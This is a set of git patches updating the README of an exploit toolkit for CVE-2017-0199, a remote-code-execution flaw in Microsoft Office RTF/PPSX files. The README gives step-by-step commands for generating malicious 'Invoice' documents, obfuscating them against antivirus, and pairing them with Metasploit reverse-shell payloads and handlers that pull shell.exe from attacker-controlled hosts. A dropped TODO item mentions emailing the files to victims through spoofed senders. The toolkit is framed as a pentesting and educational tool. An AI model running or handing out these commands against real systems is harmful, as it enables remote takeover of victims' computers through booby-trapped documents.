-1 From d3ac90a9d779a74c841f112348e0cf6ebc3ade4c Mon Sep 17 00:00:00 2001 From: ll0_0ll Date: Wed, 2 Aug 2017 15:34:21 +0400 Subject: [PATCH 5/8] Update README.md --- README.md | 42 +++++++++++++----------------------------- 1 file changed, 13 insertions(+), 29 deletions(-) diff --git a/README.md b/README.md index 79196b6..605be24 100644 --- a/README.md +++ b/README.md @@ -1,43 +1,25 @@ -## Exploit toolkit CVE-2017-0199 - v3.0 +## Exploit toolkit CVE-2017-0199 - v4.0 -Exploit toolkit CVE-2017-0199 - v3.0 is a handy python script which provides pentesters and security researchers a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious (Obfuscated) RTF file and deliver metasploit / meterpreter / other payload to victim without any complex configuration. - -### Video tutorial (for v2.0) - -https://youtu.be/42LjG7bAvpg +Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration. ### Release note: Introduced following capabilities to the script - - Generate Malicious Obfuscated RTF file ( using -x option ) to bypass AV -##### Detection rate before obfuscation - -![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v2.0-beta-3/Invoice_Normal.jpeg) -##### Detection rate after obfuscation: -![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v2.0-beta-3/Invoice_Obfuscated.jpeg) - - - Deliver custom HTA file ( using -H option ) - - Deliver remote payload + - Generate Malicious PPSX file + - Exploitation mode for generated PPSX file Version: Python version 2.7.13 -### Future release: - -Working on following feature - - - Automatically send generated malicious RTF to victim using email spoofing - - ### Scenario 1: Deliver local payload ###### Example commands 1) Generate malicious RTF file - # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1 + # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc 2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run" 3) Start toolkit in exploit mode to deliver local payload - # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe + # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe ###### Sequence diagram ![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario1.jpg) @@ -46,9 +28,9 @@ Working on following feature ### Scenario 2: Deliver Remote payload ###### Example commands 1) Generate malicious RTF file - # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1 + # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc 2) Start toolkit in exploit mode to deliver remote payload - # python cve-2017-0199_toolkit.py -M exp -e http://remoteserver.com/shell.exe + # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe ###### Sequence diagram ![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario2.jpg) @@ -57,9 +39,9 @@ Working on following feature ### Scenario 3: Deliver custom HTA file ###### Example commands 1) Generate malicious RTF file - # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1 + # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1 2) Start toolkit in exploit mode to deliver custom HTA file - # python cve-2017-0199_toolkit.py -M exp -H /tmp/custom.hta + # python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta ###### Sequence diagram ![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario3.jpg) @@ -81,6 +63,7 @@ Working on following feature -u The path to an hta file. Normally, this should be a domain or IP where this tool is running. For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file. + -t RTF|PPSX (default = RTF) Type of the file to be generated.\n" -x 0|1 (default = 0) Generate obfuscated RTF file. 0 = Disable, 1 = Enable. @@ -88,6 +71,7 @@ Working on following feature Exploitation: + -t RTF|PPSX (default = RTF) Type of file to be exolited.\n" -H Local path of a custom HTA file which needs to be delivered and executed on target. NOTE: This option will not deliver payloads specified through options "-e" and "-l" @@ -104,7 +88,7 @@ This program is for Educational purpose ONLY. Do not use it without permission. ### Credit -@nixawk for RTF sample, @bhdresh +@nixawk for RTF sample, @Li Haifei, @bhdresh ### Bug, issues, feature requests From d840cdedaf2222ee2b13744d99317099daf16e81 Mon Sep 17 00:00:00 2001 From: ll0_0ll Date: Wed, 2 Aug 2017 15:36:45 +0400 Subject: [PATCH 6/8] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 605be24..874c5c9 100644 --- a/README.md +++ b/README.md @@ -63,7 +63,7 @@ Version: Python version 2.7.13 -u The path to an hta file. Normally, this should be a domain or IP where this tool is running. For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file. - -t RTF|PPSX (default = RTF) Type of the file to be generated.\n" + -t RTF|PPSX (default = RTF) Type of the file to be generated.\n" -x 0|1 (default = 0) Generate obfuscated RTF file. 0 = Disable, 1 = Enable. @@ -71,7 +71,7 @@ Version: Python version 2.7.13 Exploitation: - -t RTF|PPSX (default = RTF) Type of file to be exolited.\n" + -t RTF|PPSX (default = RTF) Type of file to be exolited.\n" -H Local path of a custom HTA file which needs to be delivered and executed on target. NOTE: This option will not deliver payloads specified through options "-e" and "-l" From d0c26bc2aa38be01df01b62d4b586c6ebe797dc5 Mon Sep 17 00:00:00 2001 From: ll0_0ll Date: Wed, 2 Aug 2017 15:37:36 +0400 Subject: [PATCH 7/8] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 874c5c9..dbd4675 100644 --- a/README.md +++ b/README.md @@ -63,7 +63,7 @@ Version: Python version 2.7.13 -u The path to an hta file. Normally, this should be a domain or IP where this tool is running. For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file. - -t RTF|PPSX (default = RTF) Type of the file to be generated.\n" + -t RTF|PPSX (default = RTF) Type of the file to be generated. -x 0|1 (default = 0) Generate obfuscated RTF file. 0 = Disable, 1 = Enable. @@ -71,7 +71,7 @@ Version: Python version 2.7.13 Exploitation: - -t RTF|PPSX (default = RTF) Type of file to be exolited.\n" + -t RTF|PPSX (default = RTF) Type of file to be exolited. -H Local path of a custom HTA file which needs to be delivered and executed on target. NOTE: This option will not deliver payloads specified through options "-e" and "-l" From 3ca62ca7cfc479467b9acf65c71ceb4e9c33dada Mon Sep 17 00:00:00 2001 From: ll0_0ll Date: Wed, 2 Aug 2017 15:38:26 +0400 Subject: [PATCH 8/8] Update TODO.txt --- TODO.txt | 1 - 1 file changed, 1 deletion(-) diff --git a/TODO.txt b/TODO.txt index 6d1c5ed..0c5279d 100644 --- a/TODO.txt +++ b/TODO.txt @@ -1,2 +1 @@ ### Future release: -* Automatically send generated malicious RTF to victim using email spoofing